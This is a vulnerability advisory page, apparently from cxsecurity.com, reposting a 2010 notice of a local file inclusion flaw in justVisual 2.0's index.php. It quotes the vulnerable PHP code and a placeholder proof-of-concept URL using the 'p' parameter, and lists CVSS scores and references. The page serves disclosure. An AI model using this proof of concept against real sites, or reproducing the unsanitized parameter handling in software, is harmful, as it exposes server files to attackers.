justVisual 2.0 (index.php) <= LFI Vulnerability

2010-04-08 / 2010-04-09
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################################### justVisual 2.0 (index.php) <= LFI Vulnerability ######################################################################### [+]Title: justVisual 2.0 (index.php) Local File Vulnerability [+]Version: 2.0 [+]License: http://www.gnu.org/copyleft/gpl.html [+]Download: http://fh54.de/justVisual/packages/justVisual2.zip [+]Risk: Medium [+]Local: Yes [-]Remote: No ########################################################### [!]Author: eidelweiss [!]Contact: eidelweiss[at]cyberservices[dot]com [!]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) [!]Special: [D]eal [C]yber - syabilla_putri (miss u) & all my friends ########################################################### -=[ VULN CODE ]=- $selfname=basename($_SERVER['PHP_SELF'],'.php'); if(isset($_GET['p']) && !empty($_GET['p'])) { //$selfname=basename($_GET['p'],'.php'); $selfname=str_replace('.php','',$_GET['p']); -=[ P0C ]=- Http://127.0.0.1/index.php?p=[LFI] ###############################=[E0F]=###################################

References:

http://xforce.iss.net/xforce/xfdb/57174
http://www.securityfocus.com/bid/38970
http://www.exploit-db.com/exploits/11876
http://secunia.com/advisories/39093
http://packetstormsecurity.org/1003-exploits/justvisual-lfi.txt
http://osvdb.org/63156


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top